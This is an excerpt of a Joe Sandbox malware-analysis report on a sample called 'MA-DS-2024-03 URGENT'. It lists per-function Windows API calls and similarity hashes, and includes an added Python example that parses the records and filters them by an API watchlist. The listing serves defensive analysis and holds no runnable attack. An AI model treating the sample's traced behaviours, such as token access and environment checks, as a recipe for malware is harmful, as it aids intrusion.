                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                        • String ID:
                                                        • API String ID: 4127811313-0
                                                        • Opcode ID: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
                                                        • Instruction ID: ee9d34d9398b5f91fab5137b757b2ab9dbcc007e8162b1c14587a54292e2d527
                                                        • Opcode Fuzzy Hash: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
                                                        • Instruction Fuzzy Hash: 39112B39510059FBCB00EF99D8899AE77B8FB05300F4008AAF901F7291D734BA569BA9
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,016B15D8,00000000,00000000,?,016B2132,016B15D8,00000000,00000000,00000000,?,016B2283,00000006,FlsSetValue), ref: 016B21BD
                                                        • GetLastError.KERNEL32(?,016B2132,016B15D8,00000000,00000000,00000000,?,016B2283,00000006,FlsSetValue,016C6FC4,FlsSetValue,00000000,00000364,?,016B192D), ref: 016B21C9
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,016B2132,016B15D8,00000000,00000000,00000000,?,016B2283,00000006,FlsSetValue,016C6FC4,FlsSetValue,00000000), ref: 016B21D7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad$ErrorLast
                                                        • String ID:
                                                        • API String ID: 3177248105-0
                                                        • Opcode ID: 08f37b3f18d21c595636982e3f151a1dbf3e24968ee200a12316244b64a1141f
                                                        • Instruction ID: b3161b5d9d4a28dd97ffe4718f0e281b62f36582ac97e63675a90640f982f331
                                                        • Opcode Fuzzy Hash: 08f37b3f18d21c595636982e3f151a1dbf3e24968ee200a12316244b64a1141f
                                                        • Instruction Fuzzy Hash: 5101F736601232ABC73149ACECD4EA73BDCAF05BA27200628FB15E3244C720E891C7F0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                        • String ID:
                                                        • API String ID: 3016257755-0
                                                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                        • Instruction ID: 3d94be51af7e819a6a5def82be0e086b27bd99855e7e965629bee2c507946819
                                                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                        • Instruction Fuzzy Hash: 78014EB244414ABBCF2A5E84CC41CEE3F72BB1C354F599416FA9858131D23AD9B1AB85
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 0048B2E4
                                                        • ScreenToClient.USER32(?,?), ref: 0048B2FC
                                                        • ScreenToClient.USER32(?,?), ref: 0048B320
                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0048B33B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                        • String ID:
                                                        • API String ID: 357397906-0
                                                        • Opcode ID: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                                                        • Instruction ID: e0f35f64d62337ec24ef524e52db7040af9c6cc02db1932b8591958b9ea84988
                                                        • Opcode Fuzzy Hash: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                                                        • Instruction Fuzzy Hash: B9117775D00209EFDB01DF99C444AEEBBF5FF18310F104566E914E3220D735AA558F94
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(?), ref: 00466BE6
                                                          • Part of subcall function 004676C4: _memset.LIBCMT ref: 004676F9
                                                        • _memmove.LIBCMT ref: 00466C09
                                                        • _memset.LIBCMT ref: 00466C16
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00466C26
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                                        • String ID:
                                                        • API String ID: 48991266-0
                                                        • Opcode ID: c8299cc4facb39f843d1e84b6b18623dbee28ecd43af281709d82dcdf59c4b38
                                                        • Instruction ID: 06c116e41b1fbc97defe022da98efa456519ca017efd3746de7cd937a477406a
                                                        • Opcode Fuzzy Hash: c8299cc4facb39f843d1e84b6b18623dbee28ecd43af281709d82dcdf59c4b38
                                                        • Instruction Fuzzy Hash: ACF0547A200110BBCF016F56EC85A8ABF29EF45325F4480A9FE085E227D775E811CBB9
                                                        APIs
                                                        • GetSysColor.USER32(00000008), ref: 00402231
                                                        • SetTextColor.GDI32(?,000000FF), ref: 0040223B
                                                        • SetBkMode.GDI32(?,00000001), ref: 00402250
                                                        • GetStockObject.GDI32(00000005), ref: 00402258
                                                        • GetWindowDC.USER32(?,00000000), ref: 0043BE83
                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0043BE90
                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 0043BEA9
                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 0043BEC2
                                                        • GetPixel.GDI32(00000000,?,?), ref: 0043BEE2
                                                        • ReleaseDC.USER32(?,00000000), ref: 0043BEED
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                        • String ID:
                                                        • API String ID: 1946975507-0
                                                        • Opcode ID: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                                                        • Instruction ID: 54194c7dea5641a5760446fc0b471bd43188e270dcc7ade6c1867ff591c8ccba
                                                        • Opcode Fuzzy Hash: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                                                        • Instruction Fuzzy Hash: 8FE03932104244EADB215FA8EC4D7D93B10EB05332F10837AFB69980E187B54994DB16
                                                        APIs
                                                        • GetCurrentThread.KERNEL32 ref: 0045871B
                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458722
                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004582E6), ref: 0045872F
                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458736
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CurrentOpenProcessThreadToken
                                                        • String ID:
                                                        • API String ID: 3974789173-0
                                                        • Opcode ID: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                                                        • Instruction ID: 27e516f12521b82670cd12e73380cd235ac9fe5f10b87aab6d4880cb8d6f589a
                                                        • Opcode Fuzzy Hash: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                                                        • Instruction Fuzzy Hash: 69E086366113119FD7205FB45D0CB5B3BACEF55792F244C3CB645D9051DA388449C754
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: %I
                                                        • API String ID: 0-63094095
                                                        • Opcode ID: 942e1b8f80069f074c1b2c40e5fc917702e3634c8d599ac88492e2e2913508d1
                                                        • Instruction ID: fc9b66e0bafda5900f64632d1c19c64e360ede111f7e08ffc6918f9b7723571d
                                                        • Opcode Fuzzy Hash: 942e1b8f80069f074c1b2c40e5fc917702e3634c8d599ac88492e2e2913508d1
                                                        • Instruction Fuzzy Hash: F7B19D759001099ACF24EF95C8819EEB7B5EF44314F11403BE942B72D1DB3C9AA6CB9E
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: __itow_s
                                                        • String ID: xbL$xbL
                                                        • API String ID: 3653519197-3351732020
                                                        • Opcode ID: 0c6e0354c0013d4fee92ce69e041035a0e24d46cdf1018baf1def671b28a307b
                                                        • Instruction ID: dfe480003ad9fd5cab9b7df9ebde8448aad3da8901d64dd9d19fd2ed475b7079
                                                        • Opcode Fuzzy Hash: 0c6e0354c0013d4fee92ce69e041035a0e24d46cdf1018baf1def671b28a307b
                                                        • Instruction Fuzzy Hash: DFB16E70A00105EFCB14DF55C890EEAB7B9EF58344F14C46AF949AB291EB38E941CB99
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: pow
                                                        • API String ID: 0-2276729525
                                                        • Opcode ID: e46505395a015d3ac6e3c8d5a556b290717f80799406f7fba81adcf9788dab35
                                                        • Instruction ID: f6b91612cdf4cc877152b737963d4fcd13acdc3489e77dc426d1447fd97299f9
                                                        • Opcode Fuzzy Hash: e46505395a015d3ac6e3c8d5a556b290717f80799406f7fba81adcf9788dab35
                                                        • Instruction Fuzzy Hash: 77513A61A08102A6DB227B1CDDA03BF7BA4DB41741F5089ADE89642399EF358CD6CF47
                                                        APIs
                                                          • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                        • __wcsnicmp.LIBCMT ref: 0046B02D
                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0046B0F6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                        • String ID: LPT
                                                        • API String ID: 3222508074-1350329615
                                                        • Opcode ID: 2fad9f8248d96d883e87a625a7967d2388416e0194ab04b9425aff81e98ec75e
                                                        • Instruction ID: 83c5630e61c03cc96fa61f6b78faa4233f6e1162f12f5b466cba6b991e1c6364
                                                        • Opcode Fuzzy Hash: 2fad9f8248d96d883e87a625a7967d2388416e0194ab04b9425aff81e98ec75e
                                                        • Instruction Fuzzy Hash: EF617475A00215AFCB14DF54C851EEEB7B4EF09350F10806AF916EB391E738AE85CB99
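Each record in this listing follows one fixed layout: an `APIs` section of direct calls written as `Name.MODULE(args), ref: ADDR`, with nested calls marked `Part of subcall function`, the memory-dump region the function was lifted from, and a `Similarity` block whose `API ID`, `API String ID`, `Opcode ID` and fuzzy hashes are the fields an analyst carries into a search across other samples. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses that layout into per-function records, strips the `Download File` link label the page leaves on `Associated` lines, and filters records by the APIs they reach directly or through subcalls. The sample text is copied from two records on this page (trimmed to a few dump-source lines); `WATCHLIST` is a constructed illustration of an analyst's own interest list, not something the report states.

```python
"""Parse Joe Sandbox per-function records (APIs, dump source, similarity IDs)."""
import re
from dataclasses import dataclass, field

# Constructed sample: two records copied from this report's function listing.
SAMPLE = """
APIs
• GetCurrentThread.KERNEL32 ref: 0045871B
• OpenThreadToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458722
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004582E6), ref: 0045872F
• OpenProcessToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458736
Memory Dump Source
• Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
Similarity
• API ID: CurrentOpenProcessThreadToken
• String ID:
• API String ID: 3974789173-0
• Opcode ID: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
• Instruction Fuzzy Hash: 69E086366113119FD7205FB45D0CB5B3BACEF55792F244C3CB645D9051DA388449C754
APIs
  • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
  • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
• __wcsnicmp.LIBCMT ref: 0046B02D
• WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0046B0F6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
• String ID: LPT
• API String ID: 3222508074-1350329615
• Opcode ID: 2fad9f8248d96d883e87a625a7967d2388416e0194ab04b9425aff81e98ec75e
• Instruction Fuzzy Hash: EF617475A00215AFCB14DF54C851EEEB7B4EF09350F10806AF916EB391E738AE85CB99
"""

# Constructed analyst interest list (illustration only, not from the report).
WATCHLIST = {"OpenProcessToken", "OpenThreadToken", "WNetUseConnectionW"}

# Section headers of the listing; they carry no data of their own.
HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "Name.MODULE(args), ref: ADDR" or "Part of subcall function ADDR: Name.MODULE ref: ADDR"
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]+): )?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)
KV_RE = re.compile(r"^(?P<key>[A-Za-z ]+?): ?(?P<value>.*)$")
LAST_FIELD = "Instruction Fuzzy Hash"  # final line of every record

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)        # direct calls: (name, module, ref)
    subcalls: list = field(default_factory=list)    # nested: (caller, name, module, ref)
    associated: list = field(default_factory=list)  # further dump files of the region
    meta: dict = field(default_factory=dict)        # Source File, API ID, Opcode ID, ...

def parse_records(text):
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line or line in HEADERS:
            continue
        m = API_RE.match(line)
        if m:
            call = (m.group("name"), m.group("module"), m.group("ref"))
            if m.group("caller"):
                cur.subcalls.append((m.group("caller"),) + call)
            else:
                cur.apis.append(call)
            continue
        m = KV_RE.match(line)
        if not m:
            continue
        key = m.group("key")
        value = m.group("value").removesuffix("Download File").strip()  # page's link label
        if key == "Associated":
            cur.associated.append(value)
        else:
            cur.meta[key] = value
        if key == LAST_FIELD:  # record complete, start the next one
            records.append(cur)
            cur = FunctionRecord()
    if cur.apis or cur.meta:  # listing cut off mid-record
        records.append(cur)
    return records

def api_names(rec, include_subcalls=True):
    names = {name for name, _, _ in rec.apis}
    if include_subcalls:
        names |= {name for _, name, _, _ in rec.subcalls}
    return names

def find_records(records, watchlist):
    """Records whose direct or nested API set touches any API in the watchlist."""
    return [r for r in records if api_names(r) & set(watchlist)]
```

Fed the full function listing of a report, `parse_records` gives one object per function; grouping those by `Opcode ID` or `Instruction Fuzzy Hash` across two reports shows which functions are shared, and `find_records` narrows a long listing to the functions reaching a chosen API set. Note that `API ID` is the report's own concatenation of the API names (subcalls included), which is why the second record's ID mentions `__swprintf` although the sample above omits that subcall line.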
                                                        APIs
                                                        • Sleep.KERNEL32(00000000), ref: 00412968
                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 00412981
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemorySleepStatus
                                                        • String ID: @
                                                        • API String ID: 2783356886-2766056989
                                                        • Opcode ID: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                                                        • Instruction ID: a5a81f9d260a569e77baff687d6fe7a0f73e349ca0d117409dcb6840122a66be
                                                        • Opcode Fuzzy Hash: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                                                        • Instruction Fuzzy Hash: CB5159B24187449BD320EF15D885BAFBBE8FB85344F41886DF2D8911A1DB74892CCB5A
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID: DdL$DdL
                                                        • API String ID: 1473721057-91670653
                                                        • Opcode ID: 5e91e0f9761e9d7bc780f905406615417003885d8eec73c8253ff09b9dbf17c9
                                                        • Instruction ID: 8cf85b897da21b35b232154f37a53a393289a03a8f02d27ab87a98346ee69310
                                                        • Opcode Fuzzy Hash: 5e91e0f9761e9d7bc780f905406615417003885d8eec73c8253ff09b9dbf17c9
                                                        • Instruction Fuzzy Hash: 5D5113B86043019FD754DF18C580A1ABBF1BF99344F54886EE9859B3A1D339EC91CF4A
                                                        APIs
                                                        • _memset.LIBCMT ref: 0047259E
                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004725D4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CrackInternet_memset
                                                        • String ID: |
                                                        • API String ID: 1413715105-2343686810
                                                        • Opcode ID: cb178aac356a24ff43fec944d9add85da31ada705d33c094a362d2b69604a25d
                                                        • Instruction ID: 4adfb47e446f893ace23fd506e663b8e952a67a31115c745ae406753cf5a670a
                                                        • Opcode Fuzzy Hash: cb178aac356a24ff43fec944d9add85da31ada705d33c094a362d2b69604a25d
                                                        • Instruction Fuzzy Hash: A5313871D00119ABCF11AFA1CC85EEEBFB8FF08344F10406AF918B6162DB756916DB65
                                                        APIs
                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00486B17
                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00486B53
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Window$DestroyMove
                                                        • String ID: static
